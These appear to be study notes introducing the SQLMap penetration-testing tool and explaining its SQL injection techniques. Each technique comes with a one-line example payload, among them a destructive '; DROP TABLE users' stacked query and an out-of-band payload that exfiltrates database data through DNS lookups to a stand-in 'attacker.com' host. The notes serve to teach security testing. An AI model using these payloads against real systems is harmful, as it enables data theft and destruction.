# Intro - [SQLMap](https://github.com/sqlmapproject/sqlmap) is a free and open-source penetration testing tool written in Python that automates the process of detecting and exploiting SQL injection (SQLi) flaws - SQLMap comes with a powerful detection engine, numerous features, and a broad range of options and switches for fine-tuning the many aspects of it, such as: - Target connection - Injection detection - Fingerprinting| - Enumeration - Optimization - Protection detection and bypass using "tamper" scripts - Database content retrieval - File system access - Execution of the operating system (OS) commands - Supported dbs: - MySQL - Oracle - SQlite - PostreSQL - MS SQL Server - MS Access - MariaDB - And more - Supported injection types - B - boolean-based blind - E - error-based - U - union query-based - S - stacked queries - T - time-based blind - Q - inline queries # Boolean-based Blind Queries ```mysql AND 1=1 ``` - SQLMap exploits `Boolean-based blind SQL Injection` vulnerabilities through the differentiation of `TRUE` from `FALSE` query results, effectively retrieving 1 byte of information per request - The differentiation is based on comparing server responses to determine whether the SQL query returned `TRUE` or `FALSE` - This ranges from fuzzy comparisons of raw response content, HTTP codes, page titles, filtered text, and other factors # Error-based SQL Injection ```mysql AND GTID_SUBSET(@@version,0) ``` - If DBMS errors are being returned as part of the server response for any database-related problems, then there is a probability that they can be used to carry the results for requested queries - In such cases, specialized payloads for the current DBMS are used, targeting the functions that cause known misbehaviors - Error-based SQLi is considered as faster than all other types, except UNION query-based, because it can retrieve a limited amount (e.g., 200 bytes) of data called "chunks" through each request # UNION query-based SQL Injection ```mysql UNION ALL SELECT 1,@@version,3 ``` - With the usage of `UNION`, it is generally possible to extend the original (`vulnerable`) query with the injected statements' results - This way, if the original query results are rendered as part of the response, the attacker can get additional results from the injected statements within the page response itself - This type of SQL injection is considered the fastest, as, in the ideal scenario, the attacker would be able to pull the content of the whole database table of interest with a single request # Stacked Queries ```mysql ; DROP TABLE users ``` - Stacking SQL queries, also known as the "piggy-backing," is the form of injecting additional SQL statements after the vulnerable one - In case that there is a requirement for running non-query statements (e.g. `INSERT`, `UPDATE` or `DELETE`), stacking must be supported by the vulnerable platform (e.g., `Microsoft SQL Server` and `PostgreSQL` support it by default) - SQLMap can use such vulnerabilities to run non-query statements executed in advanced features (e.g., execution of OS commands) and data retrieval similarly to time-based blind SQLi types # Time-based Blind SQL Injection ```mysql AND 1=IF(2>1,SLEEP(5),0) ``` - The principle behind `Time-based blind SQL Injection` is similar to the `Boolean-based blind SQL Injection`, but here the response time is used as the source for the differentiation between `TRUE` or `FALSE` - `TRUE` response is generally characterized by the noticeable difference in the response time compared to the regular server response - `FALSE` response should result in a response time indistinguishable from regular response times - `Time-based blind SQL Injection` is considerably slower than the boolean-based blind SQLi, since queries resulting in `TRUE` would delay the server response. This SQLi type is used in cases where `Boolean-based blind SQL Injection` is not applicable # Inline Queries ```mysql SELECT (SELECT @@version) from ``` - This type of injection embeds a query within the original query - This SQL injection type is uncommon, as it needs the vulnerable web app to be written a specific way - Still, SQLMap supports this kind of SQL injection as well # Out-of-band SQL Injection ```mysql LOAD_FILE(CONCAT('\\\\',@@version,'.attacker.com\\README.txt')) ``` - Most advanced type of SQL injection, used in cases where all other types are either unsupported by the vulnerable web app or are too slow (e.g., time-based blind SQLi) - SQLMap supports out-of-band SQLi through "DNS exfiltration," where requested queries are retrieved through DNS traffic - By running the SQLMap on the DNS server for the domain under control (e.g. `.attacker.com`), SQLMap can perform the attack by forcing the server to request non-existent subdomains (e.g. `foo.attacker.com`), where `foo` would be the SQL response we want to receive - SQLMap can then collect these erroring DNS requests and collect the `foo` part, to form the entire SQL response